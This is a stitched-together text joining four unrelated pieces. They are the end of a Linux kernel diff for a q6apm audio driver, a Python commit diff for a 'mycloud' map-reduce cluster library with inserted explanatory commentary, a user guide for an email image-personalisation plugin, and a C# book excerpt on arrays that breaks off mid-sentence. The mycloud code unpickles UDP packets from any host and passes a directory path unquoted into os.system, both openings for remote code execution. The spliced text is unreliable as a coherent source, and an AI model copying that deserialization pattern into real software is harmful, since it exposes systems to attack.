+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_write_async);
+
+int q6apm_read(struct q6apm_graph *graph)
+{
+ struct data_cmd_rd_sh_mem_ep_data_buffer_v2 *read;
+ struct audioreach_graph_data *port;
+ struct audio_buffer *ab;
+ struct gpr_pkt *pkt;
+ unsigned long flags;
+ int rc = 0, iid;
+ void *p;
+
+ iid = q6apm_graph_get_tx_shmem_module_iid(graph);
+ p = audioreach_alloc_pkt(sizeof(*read),
+ DATA_CMD_RD_SH_MEM_EP_DATA_BUFFER_V2,
+ graph->tx_data.dsp_buf,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ read = p + GPR_HDR_SIZE;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ port = &graph->tx_data;
+ ab = &port->buf[port->dsp_buf];
+
+ read->buf_addr_lsw = lower_32_bits(ab->phys);
+ read->buf_addr_msw = upper_32_bits(ab->phys);
+ read->mem_map_handle = port->mem_map_handle;
+ read->buf_size = ab->size;
+
+ port->dsp_buf++;
+
+ if (port->dsp_buf >= port->num_periods)
+ port->dsp_buf = 0;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_read);
+
static int graph_callback(struct gpr_resp_pkt *data, void *priv, int op)
{
struct q6apm_graph *graph = priv;
Russell Power committed ceb6561
Better logging; rather than sucking down stderr and stdout, workers
now send log messages via UDP to the controller and also log to local
temp files.
Worker watchdog now runs in a separate thread; this allows workers to
be shut down in the middle of long-running map tasks.
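For context, this UDP logging scheme follows the standard library's pattern: logging.handlers.DatagramHandler pickles each LogRecord with a 4-byte length prefix, and the receiver rebuilds it with logging.makeLogRecord. A minimal illustrative sketch of that round trip in modern Python 3 (not code from this repository; the host name is a placeholder):

import logging, logging.handlers, pickle, struct
from socketserver import UDPServer

# Worker side: forward every log record to the controller over UDP.
log = logging.getLogger("worker")
log.addHandler(logging.handlers.DatagramHandler(
    "controller-host", logging.handlers.DEFAULT_UDP_LOGGING_PORT))

# Controller side: rebuild and print each record.
class LogReceiver(UDPServer):
    def finish_request(self, request, client_address):
        packet, _sock = request
        rlen = struct.unpack(">L", packet[:4])[0]          # 4-byte length prefix
        record = logging.makeLogRecord(pickle.loads(packet[4:4 + rlen]))
        print(client_address[0], record.getMessage())

# LogReceiver(("0.0.0.0", logging.handlers.DEFAULT_UDP_LOGGING_PORT), None).serve_forever()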
• Parent commits 10e1305
• Branches default
Files changed (7)
File src/mycloud/__init__.py
+#!/usr/bin/env python
+
import mycloud.cluster
-import mycloud.connections
-import mycloud.mapreduce
-import mycloud.merge
-import mycloud.resource
-import mycloud.util
-
-resource = mycloud.resource
-mapreduce = mycloud.mapreduce
Cluster = mycloud.cluster.Cluster
File src/mycloud/cluster.py
import mycloud.thread
import mycloud.util
import random
+import socket
import sys
import traceback
import xmlrpclib
mycloud.thread.init()
+class ClusterException(Exception):
+ pass
+
def arg_name(args):
'''Returns a short string representation of an argument list for a task.'''
a = args[0]
return a.__class__.__name__
return repr(a)
-
class Task(object):
'''A piece of work to be executed.'''
- def __init__(self, idx, function, args, kw):
- self.idx = idx
- self.pickle = cloudpickle.dumps((function, args, kw))
+ def __init__(self, name, index, function, args, kw):
+ self.idx = index
+ self.pickle = xmlrpclib.Binary(cloudpickle.dumps((function, args, kw)))
self.result = None
self.done = False
def run(self, client):
logging.info('Starting task %s on %s', self.idx, client)
self.client = client
- result_data = self.client.execute_task(xmlrpclib.Binary(self.pickle))
+ result_data = self.client.execute_task(self.pickle)
self.result = cPickle.loads(result_data.data)
self.done = True
logging.info('Task %d finished', self.idx)
A Server is created for each core on a machine, and executes tasks as
machine resources become available.'''
- def __init__(self, cluster, host):
+ def __init__(self, cluster, host, index):
self.cluster = cluster
self.host = host
- ssh = mycloud.connections.SSHConnection.connect(host)
+ self.index = index
+
+ def connect(self):
+ ssh = mycloud.connections.SSH.connect(self.host)
self.stdin, self.stdout, self.stderr = ssh.invoke(
- sys.executable, '-m', 'mycloud.worker')
+ sys.executable,
+ '-m', 'mycloud.worker',
+ '--index %s' % self.index,
+ '--logger_host %s' % socket.gethostname(),
+ '--logger_port %s' % logging.handlers.DEFAULT_UDP_LOGGING_PORT)
self.port = int(self.stdout.readline().strip())
- self.stderr_logger = (
- mycloud.util.StreamLogger(
- 'Remote(%s, %d)' % (self.host, self.port), buffer=False))
- self.stderr_logger.start(self.stderr)
-
self.ready = True
self.thread = None
-# assert self.client().healthcheck() == 'alive'
-
def start_task(self, task):
self.ready = False
self.thread = mycloud.thread.spawn(self._run_task, task)
try:
task.run(self.client())
except:
-# logging.info('Exception!', exc_info=1)
+ #logging.exception('Failed to run task')
self.cluster.report_exception(sys.exc_info())
+ self.stdin.close()
+ self.stdout.close()
finally:
self.ready = True
class Cluster(object):
- def __init__(self, machines=None, fs_prefix='/gfs'):
+ def __init__(self, machines=None, tmp_prefix=None):
self.machines = machines
- self.fs_prefix = fs_prefix
+ self.tmp_prefix = tmp_prefix
self.servers = None
self.exceptions = []
+ assert self.machines
+ assert self.tmp_prefix
+
self.start()
def __del__(self):
def report_exception(self, exc):
self.exceptions.append(exc)
+ def log_exceptions(self):
+ for e in self.exceptions:
+ exc_dump = ['remote exception: ' + line
+ for line in traceback.format_exception(*e)]
+ logging.info('\n'.join(exc_dump))
+
def start(self):
+ self.log_server = mycloud.util.LoggingServer(self)
+ mycloud.thread.spawn(self.log_server.serve_forever)
+
servers = []
+ index = 0
for host, cores in self.machines:
for i in xrange(cores):
- servers.append(
-# Server(self, host))
- mycloud.thread.spawn(lambda c, h: Server(c, h), self, host))
+ s = Server(self, host, index)
+ servers.append(s)
+ index += 1
- servers = [s.wait() for s in servers]
+ connections = [mycloud.thread.spawn(s.connect) for s in servers]
+ [c.wait() for c in connections]
+
self.servers = servers
+ random.shuffle(self.servers)
logging.info('Started %d servers...', len(servers))
-
def input(self, type, pattern):
'''Return a cluster set of cluster inputs for the given pattern.'''
return mycloud.resource.input(type, pattern)
def output(self, type, name, shards):
return mycloud.resource.output(type, name, shards)
- def map(self, f, arglist):
+ def show_status(self):
+ return
+ for (host, port), rlog in self.log_server.message_map.items():
+ print >> sys.stderr, '(%s, %s) -- %s' % (host, port, rlog.msg)
+
+ def map(self, f, arglist, name='worker'):
assert len(arglist) > 0
idx = 0
task_queue = Queue.Queue()
- tasks = [Task(i, f, args, {})
+ tasks = [Task(name, i, f, args, {})
for i, args in enumerate(arglist)]
for t in tasks:
s.start_task(t)
if self.exceptions:
- raise Exception, '\n'.join(traceback.format_exception(*self.exceptions[0]))
+ self.log_exceptions()
+ raise ClusterException
mycloud.thread.sleep(0.1)
+ self.show_status()
+
except Queue.Empty:
pass
for t in tasks:
while not t.done:
if self.exceptions:
- raise Exception, '\n'.join(traceback.format_exception(*self.exceptions[0]))
+ self.log_exceptions()
+ raise ClusterException
mycloud.thread.sleep(0.1)
logging.info('Done.')
File src/mycloud/connections.py
import logging
import ssh
import subprocess
+import threading
-class SSHConnection(object):
- connections = []
+class SSH(object):
+ connections = {}
+ connections_lock = threading.Lock()
def __init__(self, host):
self.host = host
+ self.lock = threading.Lock()
self.client = ssh.SSHClient()
self.client.set_missing_host_key_policy(ssh.AutoAddPolicy())
- self.client.connect(host)
+ self._connected = False
+
+ def _connect(self):
+ self.client.connect(self.host)
+ self._connected = True
+
+ def close(self):
+ self.client.close()
@staticmethod
def connect(host):
- c = SSHConnection(host)
- SSHConnection.connections.append(c)
- return c
+ with SSH.connections_lock:
+ if not host in SSH.connections:
+ SSH.connections[host] = SSH(host)
+
+ return SSH.connections[host]
def invoke(self, command, *args):
+ with self.lock:
+ if not self._connected:
+ self._connect()
+
logging.info('Invoking %s %s', command, args)
chan = self.client._transport.open_session()
stdin = chan.makefile('wb', 64)
@staticmethod
def shutdown():
- for connection in SSHConnection.connections:
- logging.info('Closing SSH connection to %s', connection.host)
- connection.client.close()
+ logging.info('Closing all SSH connections')
+ for connection in SSH.connections.values():
+ connection.close()
-class LocalConnection(object):
+class Local(object):
@staticmethod
def connect(host):
- return LocalConnection()
+ return Local()
def invoke(self, command, *args):
p = subprocess.Popen([command] + list(args),
return (p.stdin, p.stdout, p.stderr)
-atexit.register(SSHConnection.shutdown)
+atexit.register(SSH.shutdown)
File src/mycloud/mapreduce.py
import mycloud.merge
import mycloud.thread
import mycloud.util
-import tempfile
import types
import xmlrpclib
return r
-def identity_mapper(k, v):
- yield k, v
+def identity_mapper(k, v, output):
+ output(k, v)
-def identity_reducer(k, values):
+def identity_reducer(k, values, output):
for v in values:
- yield k, v
+ output(k, v)
-def sum_reducer(k, values):
- yield k, sum(values)
+def sum_reducer(k, values, output):
+ output(k, sum(values))
class MRHelper(object):
def __init__(self,
tmp_prefix,
num_mappers,
num_reducers,
- map_buffer_size=1000,
+ map_buffer_size=100,
reduce_buffer_size=100e6):
self.mapper = mapper
self.reducer = reducer
self.flush()
def flush(self, final=False):
- logging.info('Flushing map %d', self.index)
for shard in range(self.num_reducers):
shard_output = self.output_tmp[shard]
- logging.info('Writing to reducer')
+ if not final and not shard_output:
+ continue
+
self.reducers[shard].invoke('write_map_output',
self.index,
json.dumps(shard_output),
self.output_tmp.clear()
self.buffer_size = 0
- logging.info('Flush finished.')
+ logging.info('Flushed map %d', self.index)
def run(self):
logging.info('Reading from: %s', self.input)
else:
mapper = self.mapper
- for k, v in self.input.reader():
-# logging.info('Reading %s', k)
- for mk, mv in mapper(k, v):
-# logging.info('Writing %s', k)
- self.output(mk, mv)
+ reader = self.input.reader()
+ for k, v in reader:
+ #logging.info('Read %s', k)
+ mapper(k, v, self.output)
+ #logging.info('Mapped %s', k)
self.flush(final=True)
+ logging.info('Map of %s finished.', self.input)
class ReduceHelper(MRHelper):
self.thread = None
def write_map_output(self, mapper, block, is_finished):
- logging.info('Reading from mapper %d - done? %d', mapper, is_finished)
if is_finished:
self.maps_finished[mapper] = 1
self.flush()
def flush(self):
- logging.info('Flushing...')
+ logging.info('Reducer flushing - %s', self.buffer_size)
- tf = tempfile.NamedTemporaryFile(suffix='reducer-tmp')
+ tf = mycloud.util.create_tempfile(dir=self.tmp_prefix,
+ suffix='reducer-tmp')
bt = blocked_table.TableBuilder(tf.name)
self.buffer.sort()
for k, v in self.buffer:
del bt
self.map_tmp.append(tf)
-
+ self.buffer_size = 0
logging.info('Flush finished to %s', tf.name)
def start_server(self):
+ logging.info('Starting server...')
self.proxy_server = mycloud.util.ProxyServer()
self.serving_thread = mycloud.thread.spawn(self.proxy_server.serve_forever)
logging.info('Reducing over %s temporary map inputs.', len(inputs))
for k, v in mycloud.merge.Merger(inputs):
# logging.info('REDUCE: %s %s', k, v)
- for rk, rv in reducer(k, v):
- out.add(rk, rv)
+ reducer(k, v, out.add)
logging.info('Returning output: %s', self.output)
reducer=self.reducer,
num_mappers=len(self.input),
num_reducers=len(self.output),
- tmp_prefix=self.cluster.fs_prefix + '/tmp/mr')
+ tmp_prefix=self.cluster.tmp_prefix)
for i in range(len(self.output)) ]
reduce_tasks = self.cluster.map(lambda r: r.start_server(), reducers)
reducer=self.reducer,
num_mappers=len(self.input),
num_reducers=len(self.output),
- tmp_prefix=self.cluster.fs_prefix + '/tmp/mr')
+ tmp_prefix=self.cluster.tmp_prefix)
for i in range(len(self.input)) ]
self.cluster.map(lambda m: m.run(), mappers)
File src/mycloud/util.py
#!/usr/bin/env python
+from SimpleXMLRPCServer import SimpleXMLRPCServer
+from SocketServer import UDPServer
from cloud.serialization import cloudpickle
-from SocketServer import ThreadingMixIn
-from SimpleXMLRPCServer import SimpleXMLRPCServer
import cPickle
import logging
-import mycloud.thread
+import os
import socket
-import sys
+import struct
+import tempfile
+import time
import traceback
import types
import xmlrpclib
-class StreamLogger(object):
- '''Read lines from a file object in a separate thread.
-
- These are then logged on the local host with a given prefix.'''
- def __init__(self, prefix, buffer=True):
- self.prefix = prefix
- self.buffer = buffer
- self.lines = []
+def create_tempfile(dir, suffix):
+ os.system("mkdir -p '%s'" % dir)
+ return tempfile.NamedTemporaryFile(dir=dir, suffix=suffix)
- def start(self, stream):
- self.thread = mycloud.thread.spawn(self.run, stream)
+class LoggingServer(UDPServer):
+ log_output = ""
- def run(self, stream):
- while 1:
- line = stream.readline()
- if not line:
- break
+ def __init__(self, cluster):
+ host = '0.0.0.0'
+ port = logging.handlers.DEFAULT_UDP_LOGGING_PORT
- if not self.buffer:
- print >> sys.stderr, self.prefix + ' --- ' + line.strip()
+ UDPServer.__init__(self, (host, port), None)
+ self.timeout = 0.1
+ self.cluster = cluster
- self.lines.append(line.strip())
+ # for each distinct host, keep track of the last message sent
+ self.message_map = {}
- def dump(self):
- return (self.prefix + ' --- ' +
- ('\n' + self.prefix + ' --- ').join(self.lines))
+ def server_bind(self):
+ logging.info('LoggingServer binding to address %s', self.server_address)
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+ UDPServer.server_bind(self)
- def join(self):
- self.thread.wait()
+ def finish_request(self, request, client_address):
+ packet, socket = request
+
+ rlen = struct.unpack('>L', packet[:4])[0]
+
+ if len(packet) != rlen + 4:
+ logging.error('Received invalid logging packet. %s %s',
+ len(packet), rlen)
+
+ record = logging.makeLogRecord(cPickle.loads(packet[4:]))
+ srchost = client_address[0]
+
+ self.message_map[client_address] = record
+
+ if record.exc_info:
+ self.cluster.report_exception(record.exc_info)
+# logging.info('Exception from %s.', srchost)
+ else:
+ record.msg = 'Remote(%s) -- ' % srchost + record.msg
+# logging.getLogger().handle(record)
def to_tuple(arglist):
self.value = value
self.tb = traceback.format_exc(tb)
-class XMLServer(ThreadingMixIn, SimpleXMLRPCServer):
+class XMLServer(SimpleXMLRPCServer):
def __init__(self, *args, **kw):
SimpleXMLRPCServer.__init__(self, *args, **kw)
+ def _dispatch(self, method, params):
+ try:
+ return getattr(self, method)(*params)
+ except:
+ logging.exception('Error during dispatch!')
+ return xmlrpclib.Fault('Error while invoking method.',
+ '\n'.join(traceback.format_exc()))
+
def server_bind(self):
logging.info('Binding to address %s', self.server_address)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
SimpleXMLRPCServer.server_bind(self)
- def handle_request(self):
- try:
- SimpleXMLRPCServer.handle_request(self)
- except:
- logging.exception('Failed to handle request.')
-
-class ProxyServer(SimpleXMLRPCServer):
+class ProxyServer(XMLServer):
def __init__(self):
self.wrapped_objects = {}
- SimpleXMLRPCServer.__init__(self, ('0.0.0.0', find_open_port()))
-
- def _dispatch(self, method, params):
- return getattr(self, method)(*params)
+ XMLServer.__init__(self, ('0.0.0.0', find_open_port()))
def wrap(self, obj):
self.wrapped_objects[id(obj)] = obj
logging.info('Wrapped id %s', id(obj))
- return ProxyObject(self.server_address[0],
- self.server_address[1],
- id(obj))
+ return ProxyObject(socket.gethostname(), self.server_address[1], id(obj))
def invoke(self, objid, method, *args, **kw):
- #logging.info('Invoking %s %s %s %s',
- # self.wrapped_objects[objid], method, args, kw)
- return xmlrpclib.Binary(
- cloudpickle.dumps(
- getattr(self.wrapped_objects[objid], method)(*args, **kw)))
+ try:
+ logging.debug('Invoking object method...')
+ result = getattr(self.wrapped_objects[objid], method)(*args, **kw)
+ logging.debug('Success.')
+ return xmlrpclib.Binary(cloudpickle.dumps(result))
+ except:
+ logging.exception('Error during invocation!')
+ return xmlrpclib.Fault('Error while invoking method.',
+ '\n'.join(traceback.format_exc()))
class ProxyObject(object):
self.server = None
def get_server(self):
-# logging.info('Connecting to %s %d', self.host, self.port)
- if not self.server:
- self.server = xmlrpclib.ServerProxy('http://%s:%d' % (self.host, self.port),
- allow_none=True)
-# logging.info('Connection established to %s %d', self.host, self.port)
+ if self.server is None:
+# logging.info('Connecting to %s %d', self.host, self.port)
+ self.server = xmlrpclib.ServerProxy('http://%s:%d' % (self.host, self.port))
+# logging.info('Connection established to %s %d', self.host, self.port)
return self.server
def invoke(self, method, *args, **kw):
- return cPickle.loads(
- self.get_server().invoke(self.objid, method, *args, **kw).data)
+ for i in range(10):
+ try:
+ result = self.get_server().invoke(self.objid, method, *args, **kw)
+ return cPickle.loads(result.data)
+ except:
+ logging.exception('Failed to invoke remote method %s; trying again.' % method)
+ time.sleep(5)
+ raise Exception('Failed to invoke remote method %s on %s' % (method, self.host))
File src/mycloud/worker.py
#!/usr/bin/env python
+
from cloud.serialization import cloudpickle
+from mycloud.util import XMLServer
+import argparse
import cPickle
-import cStringIO
import logging
import mycloud.thread
import mycloud.util
+import os
import select
import socket
import sys
-import threading
import time
import xmlrpclib
__doc__ = '''Worker for executing cluster tasks.'''
+def watchdog(worker):
+ while 1:
+ r, w, x = select.select([sys.stdin], [], [sys.stdin], 1)
+ if r or x:
+ logging.info('Lost controller. Exiting.')
+ os._exit(1)
-class Worker(object):
- def __init__(self, host, port):
- self.host = host
- self.port = port
+class Worker(XMLServer):
+ def __init__(self, *args, **kw):
+ XMLServer.__init__(self, *args, **kw)
+
+ self.host = socket.gethostname()
+ self.port = self.server_address[1]
self.last_keepalive = time.time()
+ logging.info('Worker starting on %s:%s', self.host, self.port)
+
def execute_task(self, pickled):
- f, args, kw = cPickle.loads(pickled.data)
- logging.info('Executing task %s %s %s', f, args, kw)
- result = f(*args, **kw)
- dump = cloudpickle.dumps(result)
-# logging.info('Got result!')
- return xmlrpclib.Binary(dump)
+ try:
+ f, args, kw = cPickle.loads(pickled.data)
+ logging.info('Executing task %s %s %s', f, args, kw)
+ result = f(*args, **kw)
+ dump = cloudpickle.dumps(result)
+ logging.info('Got result!')
+ return xmlrpclib.Binary(dump)
+ except:
+ logging.info('Failed to execute task.', exc_info=1)
+ raise
def healthcheck(self):
self.last_keepalive = time.time()
return 'alive'
-def dump_stderr(src, dst):
- while 1:
- data = src.get_value()
- src.truncate()
- dst.write(data)
- mycloud.thread.sleep(1)
+if __name__ == '__main__':
+ p = argparse.ArgumentParser()
+ p.add_argument('--index', type=int)
+ p.add_argument('--logger_host', type=str)
+ p.add_argument('--logger_port', type=int)
+ p.add_argument('--worker_name', type=str, default='worker')
+ opts = p.parse_args()
-if __name__ == '__main__':
+ index = opts.index
myport = mycloud.util.find_open_port()
- logging.basicConfig(stream=sys.stderr,
- #filename='/tmp/worker.%d.log' % myport,
+ log_prefix = '/tmp/%s-worker-%03d' % (socket.gethostname(), index)
+
+ logging.basicConfig(stream=open(log_prefix + '.log', 'w'),
format='%(asctime)s %(funcName)s %(message)s',
level=logging.INFO)
- # Open a server on an open port, and inform our caller
- old_stderr = sys.stderr
- sys.stderr = cStringIO.StringIO()
+ if opts.logger_host:
+ logging.info('Additionally logging to %s:%s',
+ opts.logger_host, opts.logger_port)
- stderr_log = threading.Thread(target=dump_stderr, args=(sys.stderr, old_stderr))
- stderr_log.setDaemon(True)
- stderr_log.start()
+ logging.getLogger().addHandler(
+ logging.handlers.DatagramHandler(opts.logger_host, opts.logger_port))
- xmlserver = mycloud.util.XMLServer(('0.0.0.0', myport), allow_none=True)
- xmlserver.timeout = 1
-
- worker = Worker(socket.gethostname(), myport)
-
- xmlserver.register_function(worker.execute_task, 'execute_task')
- xmlserver.register_function(worker.healthcheck, 'healthcheck')
+ worker = Worker(('0.0.0.0', myport))
+ worker.timeout = 1
print myport
sys.stdout.flush()
+ # redirect stdout and stderr to local files to avoid pipe/buffering issues
+ # with controller
+ sys.stdout = open(log_prefix + '.out', 'w')
+ sys.stderr = open(log_prefix + '.err', 'w')
+
+ mycloud.thread.spawn(watchdog, worker)
+
# handle requests until we lose our stdin connection the controller
try:
while 1:
- xmlserver.handle_request()
-
- r, w, x = select.select([sys.stdin], [], [sys.stdin], 0)
- if r or x:
- break
+ worker.handle_request()
except:
logging.info('Error while serving.', exc_info=1)
+
logging.info('Shutting down.')
File tests/test_mapreduce.py
import sys
import unittest
-def map_identity(k, v):
- yield (k, v)
-
-def reduce_sum(k, values):
- #logging.info('%s %s', k, values)
- yield (k, sum(values))
-
class MapReduceTestCase(unittest.TestCase):
def testSimpleMapper(self):
- cluster = mycloud.Cluster([('localhost', 4)])
+ cluster = mycloud.Cluster([('localhost', 4)], tmp_prefix='/tmp')
input_desc = [mycloud.resource.SequenceFile(range(100)) for i in range(10)]
output_desc = [mycloud.resource.MemoryFile() for i in range(1)]
mr = mycloud.mapreduce.MapReduce(cluster,
- map_identity,
- reduce_sum,
+ mycloud.mapreduce.identity_mapper,
+ mycloud.mapreduce.sum_reducer,
input_desc,
output_desc)
result = mr.run()
self.assertEqual(v, j * 10)
def testShardedOutput(self):
- cluster = mycloud.Cluster([('localhost', 4)])
+ cluster = mycloud.Cluster([('localhost', 4)], tmp_prefix='/tmp')
input_desc = [mycloud.resource.SequenceFile(range(100)) for i in range(10)]
output_desc = [mycloud.resource.MemoryFile() for i in range(5)]
mr = mycloud.mapreduce.MapReduce(cluster,
- map_identity,
- reduce_sum,
+ mycloud.mapreduce.identity_mapper,
+ mycloud.mapreduce.sum_reducer,
input_desc,
output_desc)
result = mr.run()
Nifty Images User Guide
Nifty Images
Nifty Images is our latest plugin exclusively for use on GatorCreator email templates. It enables you to add personalisation to images in your email campaigns, based on mapped fields from your CRM or data held within GatorMail.
Start with your email template
First you'll need to create your email template in GatorCreator. Once you've added your images, simply click on the one you wish to personalise to begin.
1. Enables you to create an animated countdown
2. Enables you to add personalisation to your images
Create Countdown
Please note: Outlook does not support the full dynamic countdown; a static countdown that refreshes on open will be shown instead
Once you've selected an area to add a countdown timer to, click 'create countdown'. A window will pop up with the options below:
1. Select your background colour, either by adding a hex code or using the colour palette
2. Select a font
3. Select your font size
4. Select your font colour, either by adding a hex code or using the colour palette
5. Live preview
6. Choose 'back' to cancel
7. Once you have finished, click 'save'
Create Personalised Image
Once you've selected an image to personalise, click 'personalize'. A window will pop up with the options below:
1. Change text enables you to add your copy to the image
2. Font style: select the font from the dropdown and size
3. Text format: select alignment, fit, bold, italic or underline
4. Change colour: choose your font colour using the palette selection tool, a hex code or intelligent colour scheme selection based on your image, plus opacity
5. Alignment: select vertical and horizontal alignments
6. Min/Max: if you need to limit the characters in the image, you can do so here
7. Rotate/Skew: use the adjustment tools to change the angle of your text
8. Save when you're done (please note: you can't go back and edit your image further at this point)
9. Preview: check how your end result will look with personalisation added
10. Real time preview of your image
Preview Personalised Image
Preview your image with personalisation.
1. Type anything here to see it populate the image below
2. Use the randomiser to populate the field in your personalised image
When you're happy, click save
If you want to make more changes, click 'back'
New book: CLR via C#, Third Edition
Hey, everybody: Jeffrey Richter’s CLR via C#, Third Edition, is indeed now available! You can order it here or here (and lots of other places too, of course).
Today we’d like to share an excerpt from the book. We’ll continue excerpting this chapter over the coming weeks and months. Enjoy.
Chapter 16
Arrays
In this chapter:
Initializing Array Elements
Casting Arrays
All Arrays Are Implicitly Derived from System.Array
All Arrays Implicitly Implement IEnumerable, ICollection, and IList
Passing and Returning Arrays
Creating Non-Zero–Lower Bound Arrays
Array Access Performance
Unsafe Array Access and Fixed-Size Array
Arrays are mechanisms that allow you to treat several items as a single collection. The
Microsoft .NET common language runtime (CLR) supports single-dimensional arrays, multidimensional
arrays, and jagged arrays (that is, arrays of arrays). All array types are implicitly
derived from the System.Array abstract class, which itself is derived from System.Object.
This means that arrays are always reference types that are allocated on the managed heap
and that your application’s variable or field contains a reference to the array and not the
elements of the array itself. The following code makes this clearer:
Int32[] myIntegers; // Declares a reference to an array
myIntegers = new Int32[100]; // Creates an array of 100 Int32s
On the first line, myIntegers is a variable that’s capable of pointing to a single-dimensional
array of Int32s. Initially, myIntegers will be set to null because I haven’t allocated an
array. The second line allocates an array of 100 Int32 values, all initialized to 0, and saves the
address of this memory block in the variable myIntegers. Arrays of reference types work the same way:
Control[] myControls; // Declares a reference to an array
myControls = new Control[50]; // Creates an array of 50 Control references
The second line allocates an array of 50 Control references; all of these references
are initialized to null. Because Control is a reference type, creating the array creates only a
bunch of references; the actual objects aren’t created at this time. The address of this memory
block is returned and saved in the variable myControls.
Figure 16-1 shows how arrays of value types and arrays of reference types look in the
managed heap.
image
In the figure, the Controls array shows the result after the following lines have executed:
myControls[1] = new Button();
myControls[2] = new TextBox();
myControls[3] = myControls[2]; // Two elements refer to the same object.
myControls[46] = new DataGrid();
myControls[48] = new ComboBox();
myControls[49] = new Button();
Common Language Specification (CLS) compliance requires all arrays to be zero-based. This
allows a method written in C# to create an array and pass the array’s reference to code written
in another language, such as Microsoft Visual Basic .NET. In addition, because zero-based
arrays are, by far, the most common arrays, Microsoft has spent a lot of time optimizing their
performance. However, the CLR does support non-zero–based arrays even though their use
is discouraged. For those of you who don’t care about a slight performance penalty or cross-
language portability, I’ll demonstrate how to create and use non-zero–based arrays later in
this chapter.
Notice in Figure 16-1 that each array has some additional overhead information associated
with it. This information contains the rank of the array (number of dimensions), the lower
bounds for each dimension of the array (almost always 0), and the length of each dimension.
The overhead also contains the array’s element type. I’ll mention the methods that allow you
to query this overhead information later in this chapter.
So far, I’ve shown examples demonstrating how to create single-dimensional arrays. When
possible, you should stick with single-dimensional, zero-based arrays, sometimes referred
to as SZ arrays, or vectors. Vectors give the best performance because you can use specific
Intermediate Language (IL) instructions—such as newarr, ldelem, ldelema, ldlen, and
stelem—to manipulate them. However, if you prefer to work with multi-dimensional arrays,
you can. Here are some examples of multi-dimensional arrays:
// Create a two-dimensional array of Doubles.
Double[,] myDoubles = new Double[10, 20];
// Create a three-dimensional array of String references.
String[,,] myStrings = new String[5, 3, 10];
The CLR also supports jagged arrays, which are arrays of arrays. Zero-based, single-dimensional
jagged arrays have the same performance as normal vectors. However, accessing
the elements of a jagged array means that two or more array accesses must occur. Here are
some examples of how to create an array of polygons with each polygon consisting of an
array of Point instances:
// Create a single-dimensional array of Point arrays.
Point[][] myPolygons = new Point[3][];
// myPolygons[0] refers to an array of 10 Point instances.
myPolygons[0] = new Point[10];
// myPolygons[1] refers to an array of 20 Point instances.
myPolygons[1] = new Point[20];
// myPolygons[2] refers to an array of 30 Point instances.
myPolygons[2] = new Point[30];
// Display the Points in the first polygon.
for (Int32 x = 0; x < myPolygons[0].Length; x++)
Console.WriteLine(myPolygons[0][x]);
Note The CLR verifies that an index into an array is valid. In other words, you can’t create an
array with 100 elements in it (numbered 0 through 99) and then try to access the element at
index -5 or 100. Doing so will cause a System.IndexOutOfRangeException to be thrown.
Allowing access to memory outside the range of an array would be a breach of type safety and
a potential security hole, and the CLR doesn’t allow verifiable code to do this. Usually, the performance
degradation associated with index checking is insubstantial because the just-in-time
(JIT) compiler normally checks array bounds once before a loop executes instead of at each loop
iteration. However, if you’re still concerned about the performance hit of the CLR’s index checks,
you can use unsafe code in C# to access the array. The “Array Access Performance” section later
in this chapter demonstrates how to do this.
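For instance (a minimal illustration of the bounds check; this snippet is not from the book’s text):
Int32[] a = new Int32[100]; // valid indices are 0 through 99
Int32 v = a[100]; // throws System.IndexOutOfRangeException at run time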
Initializing Array Elements
In the previous section, I showed how to create an array object and then I showed how to
initialize the elements of the array. C# offers syntax that allows you to do these two operations
in one statement. For example:
String[] names = new String[] { "Aidan", "Grant" };
The comma-separated set of tokens contained within the braces is called an array initializer.
Each token can be an arbitrarily complex expression or, in the case of a multi-dimensional array,
a nested array initializer. In the example above, I used just two simple String expressions.
If you are declaring a local variable in a method to refer to the initialized array, then you can
use C#’s implicitly typed local variable (var) feature to simplify the code a little:
// Using C#’s implicitly typed local variable feature:
var names = new String[] { "Aidan", "Grant" };
Here, the compiler is inferring that the names local variable should be of the String[] type
since that is the type of the expression on the right of the assignment operator (=).
You can use C#’s implicitly typed array feature to have the compiler infer the type of the
array’s elements. Notice the line below has no type specified between new and []:
// Using C#’s implicitly typed local variable and implicitly typed array features:
var names = new[] { "Aidan", "Grant", null };
In the line above, the compiler examines the types of the expressions being used inside the
array to initialize the array’s elements, and the compiler chooses the closest base class that
all the elements have in common to determine the type of the array. In this example, the
compiler sees two Strings and null. Since null is implicitly castable to any reference type
(including String), the compiler infers that it should be creating and initializing an array of
String references.
If you had this code,
// Using C#’s implicitly typed local variable & implicitly typed array features: (error)
var names = new[] { "Aidan", "Grant", 123 };
the compiler would issue the message “error CS0826: No best type found for
implicitly-typed array.” This is because the base type in common between the two
Strings and the Int32 is Object, which would mean that the compiler would have to create
an array of Object references and then box the 123 and have the last array element refer to
a boxed Int32 with a value of 123. The C# compiler team thinks that boxing array elements
is too heavy-handed for the compiler to do for you implicitly, and that is why the compiler
issues the error.
As an added syntactical bonus when initializing an array, you can write the following:
String[] names = { "Aidan", "Grant" };
Notice that on the right of the assignment operator (=), only the array initializer expression is
given with no new, no type, and no []s. This syntax is nice, but unfortunately, the C#
compiler does not allow you to use implicitly typed local variables with this syntax:
// This is a local variable now (error)
var names = { "Aidan", "Grant" };
If you try to compile the line of code above, the compiler issues two messages: “error
CS0820: Cannot initialize an implicitly-typed local variable with an array
initializer” and “error CS0622: Can only use array initializer expressions to
assign to array types. Try using a new expression instead.” While the compiler
could make this work, the C# team thought that the compiler would be doing too much for
you here. It would be inferring the type of the array, new’ing the array, initializing the array,
and inferring the type of the local variable, too.
The last thing I’d like to show you is how to use implicitly typed arrays with anonymous types
and implicitly typed local variables. Anonymous types and how type identity applies to them
are discussed in Chapter 10, “Properties.” Examine the code below:
// Using C#’s implicitly typed local, implicitly typed array, and anonymous type features:
var kids = new[] {new { Name="Aidan" }, new { Name="Grant" }};
// Sample usage (with another implicitly typed local variable):
foreach (var kid in kids)
Console.WriteLine(kid.Name);
In this example, I am using an array initializer that has two expressions for the array elements.
Each expression represents an anonymous type (since no type name is specified after the new
operator). Since the two anonymous types have the identical structure (one field called Name
